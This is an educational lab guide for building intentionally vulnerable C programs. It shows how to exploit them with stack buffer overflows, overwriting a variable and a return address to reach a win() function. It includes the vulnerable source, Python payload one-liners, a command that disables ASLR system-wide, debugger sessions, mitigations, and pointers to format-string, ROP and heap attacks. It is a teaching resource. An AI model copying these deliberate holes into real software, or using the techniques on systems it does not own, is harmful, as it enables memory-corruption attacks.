Project 5: Exploit Lab (Buffer Overflow Playground)

Project 5: Exploit Lab (Buffer Overflow Playground)

Sprint: 1 - Memory & Control Difficulty: Advanced Time Estimate: 1-2 weeks Prerequisites: Solid understanding of stack frames, comfort with lldb/gdb


Overview

What youโ€™ll build: A set of intentionally vulnerable programs and exploits that demonstrate buffer overflow, return address overwriting, and memory corruptionโ€”in a controlled environment.

Why it teaches memory & control: Nothing makes memory real like watching your input overwrite a return address and redirect execution. This is where โ€œundefined behaviorโ€ stops being a compiler warning and becomes observable reality.

The Core Question Youโ€™re Answering:

โ€œWhy do buffer overflows let attackers take over computers?โ€

This question has defined computer security for 50 years. By building and exploiting vulnerable programs yourself, youโ€™ll understand exactly how memory corruption becomes code executionโ€”and why this is such a serious problem.


Safety and Ethics Notice

This project involves exploitation techniques. Use them ONLY:

  • On programs you write yourself
  • On systems you own or have explicit permission to test
  • For educational purposes

Never attempt to exploit software you donโ€™t own or systems you donโ€™t control. This is illegal and unethical.


Learning Objectives

By the end of this project, you will be able to:

  1. Explain the stack frame layout in detail (locals, saved registers, return address)
  2. Demonstrate buffer overflow by overwriting adjacent variables
  3. Redirect program execution by overwriting return addresses
  4. Use debugging tools (lldb/gdb) to observe memory corruption in real-time
  5. Explain modern mitigations (ASLR, stack canaries, DEP/NX) and why they exist
  6. Craft exploit payloads considering endianness and null bytes
  7. Understand why memory safety matters at a visceral level
  8. Read and interpret AddressSanitizer output for vulnerability detection

Theoretical Foundation

The Stack Frame: Where Vulnerabilities Live

When a function is called, a โ€œstack frameโ€ is created containing:

  1. Local variables - The functionโ€™s own data
  2. Saved registers - Including the previous frame pointer
  3. Return address - Where to go after this function returns
  4. Arguments - Parameters passed to the function
Stack Frame Layout (x86-64):

High addresses (stack grows DOWN toward low addresses)
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                    Previous Frame                               โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  Function Arguments (if any on stack)                          โ”‚
โ”‚  arg7, arg8, ... (first 6 args in registers)                  โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  Return Address (8 bytes on x86-64)                           โ”‚  โ† CRITICAL TARGET
โ”‚  Where to jump when function returns                          โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  Saved Frame Pointer (RBP) (8 bytes)                          โ”‚
โ”‚  Previous function's base pointer                             โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                โ”‚
โ”‚  Local Variables                                               โ”‚
โ”‚  - buffers, integers, pointers, etc.                          โ”‚
โ”‚  - Arrays grow UPWARD toward higher addresses                 โ”‚
โ”‚                                                                โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  (Stack pointer RSP points here)                              โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
Low addresses

KEY INSIGHT:
- Stack grows DOWN (toward lower addresses)
- Arrays grow UP (toward higher addresses)
- Buffer overflow writes UP into saved RBP and return address!

The Vulnerability Pattern

void vulnerable() {
    char buffer[64];         // 64 bytes for input
    strcpy(buffer, user_input);  // NO BOUNDS CHECKING!
}

What happens with 80 bytes of input?

BEFORE strcpy():
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  Return Address: 0x00007fff12345678 (legitimate caller)        โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  Saved RBP: 0x00007fff87654321                                โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                โ”‚
โ”‚  buffer[64] - empty                                            โ”‚
โ”‚                                                                โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

AFTER strcpy() with 80 bytes:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  Return Address: OVERWRITTEN WITH ATTACKER DATA!              โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  Saved RBP: OVERWRITTEN WITH ATTACKER DATA!                   โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                โ”‚
โ”‚  buffer[64] - filled with attacker's 64 bytes                 โ”‚
โ”‚                                                                โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

When function returns:
1. CPU pops "return address" from stack
2. CPU jumps to that address
3. Attacker controls where execution goes!

Why This Works: The ret Instruction

The ret (return) instruction does exactly this:

ret  ; equivalent to:
     ;   pop rip  (pop return address into instruction pointer)

If an attacker controls whatโ€™s at the stack position where the return address was saved, they control rip (the instruction pointer), and thus control execution.

The Kill Chain

1. Attacker identifies buffer overflow vulnerability
                    โ†“
2. Attacker determines offset to return address
                    โ†“
3. Attacker crafts payload:
   [padding to fill buffer] + [address to jump to]
                    โ†“
4. Payload is processed by vulnerable function
                    โ†“
5. strcpy/gets/etc writes past buffer boundary
                    โ†“
6. Return address is overwritten
                    โ†“
7. Function returns to attacker-chosen address
                    โ†“
8. Attacker code executes (or attacker-chosen function)

Modern Mitigations

These protections exist because of buffer overflow attacks:

1. Stack Canaries (Stack Protector)

Stack with canary:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  Return Address                                                โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  Saved RBP                                                     โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  CANARY VALUE (random, checked before return)                 โ”‚  โ† If changed, abort!
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  buffer[64]                                                    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

To overwrite return address, attacker MUST overwrite canary first.
Canary is checked before return - if wrong value, program aborts.
Compiler inserts canary automatically with -fstack-protector.

2. ASLR (Address Space Layout Randomization)

Without ASLR (predictable):
  - libc always at 0x7ffff7000000
  - Stack always at 0x7ffffffde000
  - Easy to predict addresses to jump to

With ASLR (randomized each run):
  - libc at 0x7f3a21000000 this time
  - Stack at 0x7ffc12340000 this time
  - Attacker can't reliably predict addresses

3. DEP/NX (Data Execution Prevention / No-Execute)

Memory regions have permissions:
  - Code section: Execute + Read (no write)
  - Data section: Read + Write (no execute)
  - Stack: Read + Write (no execute)

With NX stack, even if attacker injects code onto stack,
CPU refuses to execute it - "permission denied".

4. PIE (Position Independent Executable)

Without PIE:
  - Program code always at 0x400000
  - Attacker knows where all functions are

With PIE:
  - Program code at random base each run
  - Attacker can't easily jump to known functions

Project Specification

Level Structure

Youโ€™ll build progressively harder vulnerable programs:

Level Challenge Skill Demonstrated
1 Overwrite adjacent variable Basic buffer overflow
2 Overwrite return address Stack frame understanding
3 Call a โ€œwinโ€ function Address manipulation
4 Basic shellcode (optional) Code injection

Expected Deliverables

  1. Vulnerable programs (level1.c, level2.c, etc.)
  2. Exploit scripts (Python/Bash) for each level
  3. Write-up document explaining each exploit with diagrams
  4. lldb session logs showing exploitation
  5. AddressSanitizer comparison showing how it catches these bugs

Expected Output

Level 1 - Variable Overwrite:

$ ./level1 $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")
You win! Magic value: 0x12345678

Level 2 - Return Address Overwrite:

$ ./level2 $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")
You shouldn't be able to call this function!

lldb Session:

(lldb) memory read -fx -c12 $rbp-64
0x7fff5fbff870: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff5fbff880: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff5fbff890: 0x41414141 0x41414141 0x00401156 0x00000000
                                      โ†‘ Return address overwritten!

Solution Architecture

Level 1: Variable Overwrite

Concept: Buffer adjacent to important variable, overflow corrupts it.

// level1.c
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {
    int check = 0;           // Target variable
    char buffer[64];         // Vulnerable buffer

    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }

    printf("check is at %p\n", &check);
    printf("buffer is at %p\n", buffer);
    printf("Distance: %ld bytes\n", (char*)&check - buffer);

    strcpy(buffer, argv[1]);  // VULNERABILITY

    printf("check = 0x%08x\n", check);

    if (check == 0x12345678) {
        printf("You win!\n");
    } else {
        printf("Try again. check should be 0x12345678\n");
    }

    return 0;
}

Memory layout:

Stack (high to low):
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Return address                       โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Saved RBP                           โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ int check (4 bytes) = 0             โ”‚ โ† TARGET (offset ~64)
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ char buffer[64]                     โ”‚ โ† WRITE HERE
โ”‚                                     โ”‚
โ”‚ (buffer grows UP toward check)      โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Exploit:

# 64 bytes fill buffer, next 4 bytes overwrite check
# Note: little-endian byte order for 0x12345678
./level1 $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")

Level 2: Return Address Overwrite

Concept: Overflow through saved RBP into return address, redirect to win().

// level2.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void win() {
    printf("You shouldn't be able to call this function!\n");
    printf("Congratulations, you've exploited a buffer overflow!\n");
    exit(0);
}

void vulnerable(char* input) {
    char buffer[64];
    printf("buffer at %p\n", buffer);
    strcpy(buffer, input);  // VULNERABILITY
}

int main(int argc, char** argv) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }

    printf("win() is at %p\n", win);
    vulnerable(argv[1]);

    printf("Returned normally. Try harder!\n");
    return 0;
}

Memory layout in vulnerable():

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Return address (8 bytes)            โ”‚ โ† TARGET (offset 72)
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Saved RBP (8 bytes)                 โ”‚ โ† Offset 64-71
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ buffer[64]                          โ”‚ โ† WRITE HERE (offset 0-63)
โ”‚                                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Exploit:

# Find win() address first
nm ./level2 | grep win
# Output: 0000000000401156 T win

# Craft payload:
# 64 bytes for buffer + 8 bytes for saved RBP + 8 bytes for return address
python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')" | ./level2

Level 3: Calling win() with Arguments

Concept: Not just redirect, but set up proper function call with arguments.

// level3.c
void win(int arg1, int arg2) {
    if (arg1 == 0xDEADBEEF && arg2 == 0xCAFEBABE) {
        printf("You win with the right arguments!\n");
    } else {
        printf("Called win() but wrong arguments: %x, %x\n", arg1, arg2);
    }
}

This requires understanding calling conventions:

  • x86-64: first 6 integer args in RDI, RSI, RDX, RCX, R8, R9
  • Need ROP (Return Oriented Programming) techniques to set registers

Architecture: Finding Offsets

Pattern method:

# Generate unique pattern
python3 -c "print(''.join([chr(65+i//26)+chr(65+i%26) for i in range(100)]))"
# AAABACADAE... each pair is unique

# Run with pattern, examine crash
./level2 "AAABACADAEAFAGAHAIAJA..."

# In debugger, see what value is in return address
# Find that value in pattern to calculate offset

Manual calculation:

buffer[64] = 64 bytes
saved RBP = 8 bytes (x86-64)
return address starts at offset 72

Payload = "A" * 72 + address_in_little_endian

Implementation Guide

Phase 1: Setup and Level 1 (1-2 hours)

Disable protections for learning:

# Compile without stack protector
gcc -fno-stack-protector -o level1 level1.c

# On Linux, disable ASLR for debugging
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# On macOS, ASLR is harder to disable; use lldb
# Set: settings set target.disable-aslr true

Create level1.c:

  1. Declare int check = 0;
  2. Declare char buffer[64];
  3. Use strcpy(buffer, argv[1]);
  4. Check if check == 0x12345678

Find the offset:

./level1 AAAA
# Note: check is at 0x..., buffer is at 0x...
# Calculate: &check - buffer

Craft exploit:

# Python with binary output for exact bytes
python3 -c "print('A'*64 + '\x78\x56\x34\x12')" | ./level1

Phase 2: Level 2 - Control Flow Hijack (2-3 hours)

Create level2.c with win() function:

  1. Write win() that prints success message
  2. Write vulnerable() with buffer and strcpy
  3. Main calls vulnerable with user input

Find addresses:

# Find win() address
objdump -d ./level2 | grep win
# or
nm ./level2 | grep win

# Note the address (e.g., 0x401156)

Use lldb to understand layout:

lldb ./level2
(lldb) b vulnerable
(lldb) run AAAAAAAA
(lldb) frame variable
(lldb) register read rbp rsp
(lldb) memory read -fx $rbp-64

Calculate offset:

  • buffer[64] uses 64 bytes
  • Saved RBP uses 8 bytes (x86-64)
  • Return address is at offset 72

Craft and test exploit:

python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')" > exploit.bin
./level2 $(cat exploit.bin)

Phase 3: Debugging with lldb (2-3 hours)

Full debugging session:

lldb ./level2
(lldb) settings set target.disable-aslr true
(lldb) b vulnerable
(lldb) run $(python3 -c "print('A'*80)")

# At breakpoint, before strcpy
(lldb) register read rsp rbp rip
(lldb) memory read -fx -c20 $rbp-80  # View stack

# Step over strcpy
(lldb) n

# After strcpy
(lldb) memory read -fx -c20 $rbp-80  # See corruption
(lldb) register read

# Continue to see crash/redirect
(lldb) c

Document what you see:

  1. Stack before overflow
  2. Stack after overflow
  3. Return address value
  4. Where execution goes

Phase 4: AddressSanitizer Detection (1 hour)

Compile with AddressSanitizer:

clang -fsanitize=address -g level2.c -o level2_asan

Run and observe detection:

./level2_asan $(python3 -c "print('A'*80)")

# Output shows:
# ==12345==ERROR: AddressSanitizer: stack-buffer-overflow
# WRITE of size 81 at 0x7ffc8b2a1234
#     #0 0x... in strcpy
#     #1 0x... in vulnerable level2.c:12

Compare:

  • Without sanitizer: silent corruption, unexpected behavior
  • With sanitizer: immediate detection with exact location

Phase 5: Write-Up Document (2-3 hours)

Create EXPLOIT_WRITEUP.md with:

  1. Introduction: What are buffer overflows?
  2. Environment: OS, compiler, flags used
  3. Level 1 Walkthrough:
    • Source code analysis
    • Memory layout diagram
    • Offset calculation
    • Exploit payload
    • Screenshot of success
  4. Level 2 Walkthrough:
    • Source code analysis
    • Stack frame diagram
    • lldb session showing corruption
    • Exploit payload with explanation
    • Screenshot of redirected execution
  5. Mitigations: What would prevent these?
  6. Real-World Impact: Famous vulnerabilities

Testing Strategy

Verification Checklist

Level 1:

  • Without exploit: โ€œTry againโ€ message
  • With exploit: โ€œYou win!โ€ message
  • check variable value is exactly 0x12345678
  • lldb shows corruption of check variable

Level 2:

  • Without exploit: โ€œReturned normallyโ€ message
  • With exploit: win() message appears
  • lldb shows return address overwritten
  • Address in exploit matches win() address

AddressSanitizer:

  • Catches Level 1 overflow
  • Catches Level 2 overflow
  • Shows correct source location
  • Shows size of overflow

Edge Cases to Test

# Exactly buffer size (should be safe)
./level1 $(python3 -c "print('A'*63)")

# One byte overflow
./level1 $(python3 -c "print('A'*65)")

# Different padding lengths to find exact offset
./level1 $(python3 -c "print('A'*60 + 'BBBB')")
./level1 $(python3 -c "print('A'*64 + 'BBBB')")
./level1 $(python3 -c "print('A'*68 + 'BBBB')")

Common Pitfalls

Pitfall 1: Endianness Confusion

# WRONG: Big-endian byte order
payload = b'A'*72 + b'\x00\x00\x00\x00\x00\x40\x11\x56'

# CORRECT: Little-endian on x86
payload = b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00'

# For address 0x0000000000401156:
# Least significant byte first: 56 11 40 00 00 00 00 00

Pitfall 2: Null Bytes in Address

# Problem: Address 0x00401156 contains null byte
# strcpy stops at null byte!

# If your win() address has null bytes (common), strcpy may stop early
# Solutions:
# 1. Use gets() instead of strcpy (doesn't stop at null)
# 2. Compile with -no-pie for different address range
# 3. Use environment variable or stdin for input

Pitfall 3: Stack Alignment

// x86-64 requires 16-byte stack alignment for some instructions
// If you overflow by wrong amount, may crash for wrong reason

// Add/remove padding if you see SIGBUS or unexpected behavior
payload = b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00'
// Try also:
payload = b'A'*80 + b'\x56\x11\x40\x00\x00\x00\x00\x00'

Pitfall 4: Compiler Optimizations

# WRONG: Compiler may reorder variables, eliminating vulnerability
gcc -O2 level1.c -o level1

# CORRECT: Disable optimizations for learning
gcc -O0 -fno-stack-protector level1.c -o level1

Pitfall 5: Variable Declaration Order

// WRONG: May not create adjacent layout
int check = 0;
char buffer[64];
int other = 0;  // Compiler may put check after buffer!

// BETTER: Use struct to guarantee layout
struct {
    char buffer[64];
    int check;
} data;

Extensions and Challenges

Challenge 1: Format String Vulnerability (Medium)

void vulnerable(char* input) {
    printf(input);  // VULNERABILITY: user controls format string
}

// Exploit: %x leaks stack values, %n writes to memory
./vuln "%x.%x.%x.%x"  // Leak stack

Challenge 2: Return-to-libc (Hard)

Instead of jumping to win(), call system("/bin/sh"):

  1. Find address of system() in libc
  2. Find address of โ€œ/bin/shโ€ string in libc
  3. Set up call using ROP gadgets

Challenge 3: ROP Chain (Advanced)

Chain multiple โ€œgadgetsโ€ (instruction sequences ending in ret) to:

  1. Pop values into registers
  2. Call functions with arguments
  3. Bypass DEP/NX protection

Challenge 4: Heap Overflow (Advanced)

Exploit malloc metadata corruption:

char* a = malloc(64);
char* b = malloc(64);
strcpy(a, user_input);  // Overflow into b's metadata
free(b);  // Exploit corrupted metadata

Challenge 5: Write Mitigated Version (Medium)

Rewrite vulnerable programs with protections:

// Instead of strcpy
strncpy(buffer, input, sizeof(buffer) - 1);
buffer[sizeof(buffer) - 1] = '\0';

// Or better, use strlcpy if available
strlcpy(buffer, input, sizeof(buffer));

Real-World Context

Famous Buffer Overflow Exploits

Morris Worm (1988):

  • First major internet worm
  • Exploited buffer overflow in fingerd
  • Crashed 10% of internet (~6000 machines)

Code Red (2001):

  • Buffer overflow in IIS web server
  • Infected 359,000 servers in 14 hours
  • $2.6 billion in damages

Heartbleed (2014):

  • Buffer over-read (not overflow) in OpenSSL
  • Could read server memory including private keys
